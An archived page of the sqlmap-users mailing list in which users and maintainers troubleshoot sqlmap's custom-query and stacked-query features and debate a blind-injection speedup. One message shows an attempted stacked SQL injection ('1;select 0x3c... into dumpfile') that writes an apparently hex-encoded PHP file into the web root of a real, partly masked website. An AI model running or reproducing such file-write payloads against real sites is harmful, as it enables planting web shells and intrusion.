sqlmap-users Mailing List for sqlmap (Page 41)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:12:37
|
p.s. 15 days ago there was no such warning for "INTO OUTFILE" but also it (silently) didn't work On Wed, Feb 20, 2013 at 3:11 PM, Miroslav Stampar < mir...@gm...> wrote: > Do you see that warning: "execution of custom SQL queries is only > available when stacked queries are supported". Do you know what does it > mean? > > I've said that you need stacking -> you need to have "STACKED" technique > available for exploitation. In your case that's not the case. > > Kind regards, > Miroslav Stampar > > > On Wed, Feb 20, 2013 at 3:05 PM, ml <ml...@sm...> wrote: > >> Le 2013-02-20 14:52, Miroslav Stampar a écrit : >> >>> p.s. problem is that INTO OUTFILE affects only the SELECT query where >>> is supposed to be done. In your case you have one query which is >>> INJECTABLE and one separate CUSTOM query which needs to include INTO >>> OUTFILE -> this is a conflict which requires usage of stacking (or you >>> can try to exploit it manually using original query) >>> >> >> >> >> sql-shell> 1;select 0x3c*******e into dumpfile >> "/www/doc/www.**************.**cz/www/new/upload.php"; >> [15:01:16] [WARNING] execution of custom SQL queries is only available >> when stacked queries are supported >> >> >> in the case of a concrete example I get this even with stacking >> >> >> >>> On Wed, Feb 20, 2013 at 2:48 PM, Miroslav Stampar >>> <mir...@gm...> wrote: >>> >>> For using "INTO OUTFILE" in a specific SELECT query you need stacking >>>> (or you can try to exploit it manually). We can't help you here. >>>> >>>> Bye >>>> >>>> On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote: >>>> >>>> Le 2013-02-20 09:53, Miroslav Stampar a écrit : >>>>> >>>>> --sql-query WORKS (tested this moment with ERROR based-only technique >>>>>> using query "SELECT id FROM users") >>>>>> --sql-shell WORKS (tested this moment with ERROR based-only technique >>>>>> using query "SELECT id FROM users") >>>>>> >>>>>> To distinguish things a bit. Query is a SQL command that starts with >>>>>> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require >>>>>> "stacking". >>>>>> >>>>>> You haven't stated what switch have you used, nor which >>>>>> query/non-query command have you tried, nor which techniques were >>>>>> available in your case... Nothing. >>>>>> >>>>> >>>>> I tried an application style >>>>> >>>>> select 0x3a into outfile './test.txt' >>>>> >>>>> and that >>>>> >>>>> the shell answers a error >>>>> custom query are not disponible >>>>> >>>>> simple query style >>>>> SELECT id FROM users works >>>>> >>>>> but when you add into dumpfile outfile or it does not work >>>>> >>>>> I tried putting 1; in front of the stack or no more successful >>>>> >>>>> there is a problem >>>>> >>>>> On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: >>>>>> >>>>>> hello guru >>>>>>> >>>>>>> I ask you a little help. >>>>>>> all the "custom query" are no longer possible >>>>>>> to execute custom query sqlmap answers the "stacked query" are not >>>>>>> supported. >>>>>>> >>>>>>> what inplique lines of code that execute 15 days ago in the past do >>>>>>> not >>>>>>> work anymore >>>>>>> >>>>>>> please provide a little help >>>>>>> >>>>>>> sincerely >>>>>>> -- >>>>>>> gpg --keyserver pgp.mit.edu [1] [1] --recv-key C2626742 >>>>>>> http://about.me/fakessh [2] [2] >>>>>>> >>>>>>> >>>>>>> ------------------------------**------------------------------** >>>>>>> ------------------ >>>>>>> Everyone hates slow websites. So do we. >>>>>>> Make your web apps faster with AppDynamics >>>>>>> Download AppDynamics Lite for free today: >>>>>>> http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] [3] >>>>>>> ______________________________**_________________ >>>>>>> sqlmap-users mailing list >>>>>>> sqlmap-users@lists.**sourceforge.net<sql...@li...> >>>>>>> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] [4] >>>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm [5] [5] >>>>>> >>>>>> Links: >>>>>> ------ >>>>>> [1] http://pgp.mit.edu [1] >>>>>> [2] http://about.me/fakessh [2] >>>>>> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] >>>>>> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] >>>>>> [5] http://about.me/stamparm [5] >>>>>> >>>>> >>>>> -- >>>>> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >>>>> http://about.me/fakessh [2] >>>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm [5] >>>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm [5] >>> >>> Links: >>> ------ >>> [1] http://pgp.mit.edu >>> [2] http://about.me/fakessh >>> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb> >>> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>> [5] http://about.me/stamparm >>> >> >> -- >> gpg --keyserver pgp.mit.edu --recv-key C2626742 >> http://about.me/fakessh >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Andres R. <and...@gm...> - 2013-02-20 14:12:15
|
Miroslav, On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > In theory this works, in practice it doesn't. We already overturned 2-3 guys > proposing this. Today's pages are too dynamic (banners, promos, etc.). But sqlmap already supports comparing pages with minor differences (using difflib, correct?) > Also, > you would need a parameter value with a big covering range (lots of > different values). 256 different rows for a table doesn't seem to be something difficult to find; while not possible in all cases I agree. > Also, whoever wrote this don't have a clue about this subject: ' The > attacker would then take a checksum of the returned html data'. This is > being done in kiddish scripts. Real SQLi tool knows that checksum is faaar > from reliable. See difflib above. > Anyway, answer is no. I think you're disregarding a good idea (if correctly implemented it provides a 8-times performance improvement) way too fast. Implementation is going to be difficult, but the benefits are great, > Kind regards, > Miroslav Stampar > > On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...> > wrote: >> >> Should probably look into adding this, >> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation >> >> ------------------------------------------------------------------------------ >> Everyone hates slow websites. So do we. >> Make your web apps faster with AppDynamics >> Download AppDynamics Lite for free today: >> http://p.sf.net/sfu/appdyn_d2d_feb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:11:26
|
Do you see that warning: "execution of custom SQL queries is only available when stacked queries are supported". Do you know what does it mean? I've said that you need stacking -> you need to have "STACKED" technique available for exploitation. In your case that's not the case. Kind regards, Miroslav Stampar On Wed, Feb 20, 2013 at 3:05 PM, ml <ml...@sm...> wrote: > Le 2013-02-20 14:52, Miroslav Stampar a écrit : > >> p.s. problem is that INTO OUTFILE affects only the SELECT query where >> is supposed to be done. In your case you have one query which is >> INJECTABLE and one separate CUSTOM query which needs to include INTO >> OUTFILE -> this is a conflict which requires usage of stacking (or you >> can try to exploit it manually using original query) >> > > > > sql-shell> 1;select 0x3c*******e into dumpfile > "/www/doc/www.**************.**cz/www/new/upload.php"; > [15:01:16] [WARNING] execution of custom SQL queries is only available > when stacked queries are supported > > > in the case of a concrete example I get this even with stacking > > > >> On Wed, Feb 20, 2013 at 2:48 PM, Miroslav Stampar >> <mir...@gm...> wrote: >> >> For using "INTO OUTFILE" in a specific SELECT query you need stacking >>> (or you can try to exploit it manually). We can't help you here. >>> >>> Bye >>> >>> On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote: >>> >>> Le 2013-02-20 09:53, Miroslav Stampar a écrit : >>>> >>>> --sql-query WORKS (tested this moment with ERROR based-only technique >>>>> using query "SELECT id FROM users") >>>>> --sql-shell WORKS (tested this moment with ERROR based-only technique >>>>> using query "SELECT id FROM users") >>>>> >>>>> To distinguish things a bit. Query is a SQL command that starts with >>>>> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require >>>>> "stacking". >>>>> >>>>> You haven't stated what switch have you used, nor which >>>>> query/non-query command have you tried, nor which techniques were >>>>> available in your case... Nothing. >>>>> >>>> >>>> I tried an application style >>>> >>>> select 0x3a into outfile './test.txt' >>>> >>>> and that >>>> >>>> the shell answers a error >>>> custom query are not disponible >>>> >>>> simple query style >>>> SELECT id FROM users works >>>> >>>> but when you add into dumpfile outfile or it does not work >>>> >>>> I tried putting 1; in front of the stack or no more successful >>>> >>>> there is a problem >>>> >>>> On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: >>>>> >>>>> hello guru >>>>>> >>>>>> I ask you a little help. >>>>>> all the "custom query" are no longer possible >>>>>> to execute custom query sqlmap answers the "stacked query" are not >>>>>> supported. >>>>>> >>>>>> what inplique lines of code that execute 15 days ago in the past do >>>>>> not >>>>>> work anymore >>>>>> >>>>>> please provide a little help >>>>>> >>>>>> sincerely >>>>>> -- >>>>>> gpg --keyserver pgp.mit.edu [1] [1] --recv-key C2626742 >>>>>> http://about.me/fakessh [2] [2] >>>>>> >>>>>> >>>>>> ------------------------------**------------------------------** >>>>>> ------------------ >>>>>> Everyone hates slow websites. So do we. >>>>>> Make your web apps faster with AppDynamics >>>>>> Download AppDynamics Lite for free today: >>>>>> http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] [3] >>>>>> ______________________________**_________________ >>>>>> sqlmap-users mailing list >>>>>> sqlmap-users@lists.**sourceforge.net<sql...@li...> >>>>>> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] [4] >>>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm [5] [5] >>>>> >>>>> Links: >>>>> ------ >>>>> [1] http://pgp.mit.edu [1] >>>>> [2] http://about.me/fakessh [2] >>>>> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] >>>>> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] >>>>> [5] http://about.me/stamparm [5] >>>>> >>>> >>>> -- >>>> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >>>> http://about.me/fakessh [2] >>>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm [5] >>> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm [5] >> >> Links: >> ------ >> [1] http://pgp.mit.edu >> [2] http://about.me/fakessh >> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb> >> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> [5] http://about.me/stamparm >> > > -- > gpg --keyserver pgp.mit.edu --recv-key C2626742 > http://about.me/fakessh > -- Miroslav Stampar http://about.me/stamparm |
|
From: ml <ml...@sm...> - 2013-02-20 14:06:06
|
Le 2013-02-20 14:52, Miroslav Stampar a écrit : > p.s. problem is that INTO OUTFILE affects only the SELECT query where > is supposed to be done. In your case you have one query which is > INJECTABLE and one separate CUSTOM query which needs to include INTO > OUTFILE -> this is a conflict which requires usage of stacking (or > you > can try to exploit it manually using original query) sql-shell> 1;select 0x3c*******e into dumpfile "/www/doc/www.**************.cz/www/new/upload.php"; [15:01:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported in the case of a concrete example I get this even with stacking > > On Wed, Feb 20, 2013 at 2:48 PM, Miroslav Stampar > <mir...@gm...> wrote: > >> For using "INTO OUTFILE" in a specific SELECT query you need >> stacking (or you can try to exploit it manually). We can't help you >> here. >> >> Bye >> >> On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote: >> >>> Le 2013-02-20 09:53, Miroslav Stampar a écrit : >>> >>>> --sql-query WORKS (tested this moment with ERROR based-only >>>> technique >>>> using query "SELECT id FROM users") >>>> --sql-shell WORKS (tested this moment with ERROR based-only >>>> technique >>>> using query "SELECT id FROM users") >>>> >>>> To distinguish things a bit. Query is a SQL command that starts >>>> with >>>> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require >>>> "stacking". >>>> >>>> You haven't stated what switch have you used, nor which >>>> query/non-query command have you tried, nor which techniques were >>>> available in your case... Nothing. >>> >>> I tried an application style >>> >>> select 0x3a into outfile './test.txt' >>> >>> and that >>> >>> the shell answers a error >>> custom query are not disponible >>> >>> simple query style >>> SELECT id FROM users works >>> >>> but when you add into dumpfile outfile or it does not work >>> >>> I tried putting 1; in front of the stack or no more successful >>> >>> there is a problem >>> >>>> On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: >>>> >>>>> hello guru >>>>> >>>>> I ask you a little help. >>>>> all the "custom query" are no longer possible >>>>> to execute custom query sqlmap answers the "stacked query" are >>>>> not >>>>> supported. >>>>> >>>>> what inplique lines of code that execute 15 days ago in the past >>>>> do not >>>>> work anymore >>>>> >>>>> please provide a little help >>>>> >>>>> sincerely >>>>> -- >>>>> gpg --keyserver pgp.mit.edu [1] [1] --recv-key C2626742 >>>>> http://about.me/fakessh [2] [2] >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> Everyone hates slow websites. So do we. >>>>> Make your web apps faster with AppDynamics >>>>> Download AppDynamics Lite for free today: >>>>> http://p.sf.net/sfu/appdyn_d2d_feb [3] [3] >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4] [4] >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm [5] [5] >>>> >>>> Links: >>>> ------ >>>> [1] http://pgp.mit.edu [1] >>>> [2] http://about.me/fakessh [2] >>>> [3] http://p.sf.net/sfu/appdyn_d2d_feb [3] >>>> [4] https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4] >>>> [5] http://about.me/stamparm [5] >>> >>> -- >>> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >>> http://about.me/fakessh [2] >> >> -- >> Miroslav Stampar >> http://about.me/stamparm [5] > > -- > Miroslav Stampar > http://about.me/stamparm [5] > > Links: > ------ > [1] http://pgp.mit.edu > [2] http://about.me/fakessh > [3] http://p.sf.net/sfu/appdyn_d2d_feb > [4] https://lists.sourceforge.net/lists/listinfo/sqlmap-users > [5] http://about.me/stamparm -- gpg --keyserver pgp.mit.edu --recv-key C2626742 http://about.me/fakessh |
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 13:52:10
|
p.s. problem is that INTO OUTFILE affects only the SELECT query where is supposed to be done. In your case you have one query which is INJECTABLE and one separate CUSTOM query which needs to include INTO OUTFILE -> this is a conflict which requires usage of stacking (or you can try to exploit it manually using original query) On Wed, Feb 20, 2013 at 2:48 PM, Miroslav Stampar < mir...@gm...> wrote: > For using "INTO OUTFILE" in a specific SELECT query you need stacking (or > you can try to exploit it manually). We can't help you here. > > Bye > > > On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote: > >> Le 2013-02-20 09:53, Miroslav Stampar a écrit : >> >>> --sql-query WORKS (tested this moment with ERROR based-only technique >>> using query "SELECT id FROM users") >>> --sql-shell WORKS (tested this moment with ERROR based-only technique >>> using query "SELECT id FROM users") >>> >>> To distinguish things a bit. Query is a SQL command that starts with >>> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require >>> "stacking". >>> >>> You haven't stated what switch have you used, nor which >>> query/non-query command have you tried, nor which techniques were >>> available in your case... Nothing. >>> >>> >> I tried an application style >> >> select 0x3a into outfile './test.txt' >> >> and that >> >> the shell answers a error >> custom query are not disponible >> >> simple query style >> SELECT id FROM users works >> >> but when you add into dumpfile outfile or it does not work >> >> I tried putting 1; in front of the stack or no more successful >> >> >> there is a problem >> >> On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: >>> >>> hello guru >>>> >>>> I ask you a little help. >>>> all the "custom query" are no longer possible >>>> to execute custom query sqlmap answers the "stacked query" are not >>>> supported. >>>> >>>> what inplique lines of code that execute 15 days ago in the past do not >>>> work anymore >>>> >>>> please provide a little help >>>> >>>> sincerely >>>> -- >>>> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >>>> http://about.me/fakessh [2] >>>> >>>> >>>> ------------------------------**------------------------------** >>>> ------------------ >>>> Everyone hates slow websites. So do we. >>>> Make your web apps faster with AppDynamics >>>> Download AppDynamics Lite for free today: >>>> http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] >>>> ______________________________**_________________ >>>> sqlmap-users mailing list >>>> sqlmap-users@lists.**sourceforge.net<sql...@li...> >>>> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] >>>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm [5] >>> >>> Links: >>> ------ >>> [1] http://pgp.mit.edu >>> [2] http://about.me/fakessh >>> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb> >>> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>> [5] http://about.me/stamparm >>> >> >> -- >> gpg --keyserver pgp.mit.edu --recv-key C2626742 >> http://about.me/fakessh >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 13:48:40
|
For using "INTO OUTFILE" in a specific SELECT query you need stacking (or you can try to exploit it manually). We can't help you here. Bye On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote: > Le 2013-02-20 09:53, Miroslav Stampar a écrit : > >> --sql-query WORKS (tested this moment with ERROR based-only technique >> using query "SELECT id FROM users") >> --sql-shell WORKS (tested this moment with ERROR based-only technique >> using query "SELECT id FROM users") >> >> To distinguish things a bit. Query is a SQL command that starts with >> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require >> "stacking". >> >> You haven't stated what switch have you used, nor which >> query/non-query command have you tried, nor which techniques were >> available in your case... Nothing. >> >> > I tried an application style > > select 0x3a into outfile './test.txt' > > and that > > the shell answers a error > custom query are not disponible > > simple query style > SELECT id FROM users works > > but when you add into dumpfile outfile or it does not work > > I tried putting 1; in front of the stack or no more successful > > > there is a problem > > On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: >> >> hello guru >>> >>> I ask you a little help. >>> all the "custom query" are no longer possible >>> to execute custom query sqlmap answers the "stacked query" are not >>> supported. >>> >>> what inplique lines of code that execute 15 days ago in the past do not >>> work anymore >>> >>> please provide a little help >>> >>> sincerely >>> -- >>> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >>> http://about.me/fakessh [2] >>> >>> >>> ------------------------------**------------------------------** >>> ------------------ >>> Everyone hates slow websites. So do we. >>> Make your web apps faster with AppDynamics >>> Download AppDynamics Lite for free today: >>> http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb>[3] >>> ______________________________**_________________ >>> sqlmap-users mailing list >>> sqlmap-users@lists.**sourceforge.net<sql...@li...> >>> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>[4] >>> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm [5] >> >> Links: >> ------ >> [1] http://pgp.mit.edu >> [2] http://about.me/fakessh >> [3] http://p.sf.net/sfu/appdyn_**d2d_feb<http://p.sf.net/sfu/appdyn_d2d_feb> >> [4] https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> [5] http://about.me/stamparm >> > > -- > gpg --keyserver pgp.mit.edu --recv-key C2626742 > http://about.me/fakessh > -- Miroslav Stampar http://about.me/stamparm |
|
From: ml <ml...@sm...> - 2013-02-20 13:45:28
|
Le 2013-02-20 09:53, Miroslav Stampar a écrit : > --sql-query WORKS (tested this moment with ERROR based-only technique > using query "SELECT id FROM users") > --sql-shell WORKS (tested this moment with ERROR based-only technique > using query "SELECT id FROM users") > > To distinguish things a bit. Query is a SQL command that starts with > "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require > "stacking". > > You haven't stated what switch have you used, nor which > query/non-query command have you tried, nor which techniques were > available in your case... Nothing. > I tried an application style select 0x3a into outfile './test.txt' and that the shell answers a error custom query are not disponible simple query style SELECT id FROM users works but when you add into dumpfile outfile or it does not work I tried putting 1; in front of the stack or no more successful there is a problem > On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: > >> hello guru >> >> I ask you a little help. >> all the "custom query" are no longer possible >> to execute custom query sqlmap answers the "stacked query" are not >> supported. >> >> what inplique lines of code that execute 15 days ago in the past do >> not >> work anymore >> >> please provide a little help >> >> sincerely >> -- >> gpg --keyserver pgp.mit.edu [1] --recv-key C2626742 >> http://about.me/fakessh [2] >> >> >> ------------------------------------------------------------------------------ >> Everyone hates slow websites. So do we. >> Make your web apps faster with AppDynamics >> Download AppDynamics Lite for free today: >> http://p.sf.net/sfu/appdyn_d2d_feb [3] >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4] > > -- > Miroslav Stampar > http://about.me/stamparm [5] > > Links: > ------ > [1] http://pgp.mit.edu > [2] http://about.me/fakessh > [3] http://p.sf.net/sfu/appdyn_d2d_feb > [4] https://lists.sourceforge.net/lists/listinfo/sqlmap-users > [5] http://about.me/stamparm -- gpg --keyserver pgp.mit.edu --recv-key C2626742 http://about.me/fakessh |
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 08:53:48
|
--sql-query WORKS (tested this moment with ERROR based-only technique using query "SELECT id FROM users") --sql-shell WORKS (tested this moment with ERROR based-only technique using query "SELECT id FROM users") To distinguish things a bit. Query is a SQL command that starts with "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require "stacking". You haven't stated what switch have you used, nor which query/non-query command have you tried, nor which techniques were available in your case... Nothing. On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote: > hello guru > > > > I ask you a little help. > all the "custom query" are no longer possible > to execute custom query sqlmap answers the "stacked query" are not > supported. > > what inplique lines of code that execute 15 days ago in the past do not > work anymore > > > please provide a little help > > > sincerely > -- > gpg --keyserver pgp.mit.edu --recv-key C2626742 > http://about.me/fakessh > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-02-20 07:15:37
|
Hi. In theory this works, in practice it doesn't. We already overturned 2-3 guys proposing this. Today's pages are too dynamic (banners, promos, etc.). Also, you would need a parameter value with a big covering range (lots of different values). Also, whoever wrote this don't have a clue about this subject: ' The attacker would then take a checksum of the returned html data'. This is being done in kiddish scripts. Real SQLi tool knows that checksum is faaar from reliable. Anyway, answer is no. Kind regards, Miroslav Stampar On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...> wrote: > Should probably look into adding this, > http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Andres R. <and...@gm...> - 2013-02-20 03:07:44
|
Liked the idea, implementation might be rather difficult and might have many errors. I would recommend "calibrating" the new comparative precomputation algorithm and then extract 10 bytes -or some other number- using both algorithms (old and precomp). If they are the same, continue using precomp else fallback to the old/stable algorithm On Tue, Feb 19, 2013 at 10:10 PM, Julius Kivimäki <jul...@gm...> wrote: > Should probably look into adding this, > http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Julius K. <jul...@gm...> - 2013-02-20 01:10:47
|
Should probably look into adding this, http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation |
|
From: Andres R. <and...@gm...> - 2013-02-19 23:35:30
|
Regression alert! Regression alert! sqlmap needs more unittests :) On Tue, Feb 19, 2013 at 7:37 PM, ml <ml...@sm...> wrote: > hello guru > > > > I ask you a little help. > all the "custom query" are no longer possible > to execute custom query sqlmap answers the "stacked query" are not > supported. > > what inplique lines of code that execute 15 days ago in the past do not > work anymore > > > please provide a little help > > > sincerely > -- > gpg --keyserver pgp.mit.edu --recv-key C2626742 > http://about.me/fakessh > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: ml <ml...@sm...> - 2013-02-19 22:37:21
|
hello guru I ask you a little help. all the "custom query" are no longer possible to execute custom query sqlmap answers the "stacked query" are not supported. what inplique lines of code that execute 15 days ago in the past do not work anymore please provide a little help sincerely -- gpg --keyserver pgp.mit.edu --recv-key C2626742 http://about.me/fakessh |
|
From: Leon J. <leo...@gm...> - 2013-02-18 11:32:04
|
On Monday, February 18, 2013, Bernardo Damele A. G. wrote: > > --technique T to force only time-based SQL injection. Refer to the > user's manual for further details on --technique switch. > > Apologies. It is technique not type :) -- Regards L. Sent using electronic mail ツ |
|
From: Bernardo D. A. G. <ber...@gm...> - 2013-02-18 09:56:07
|
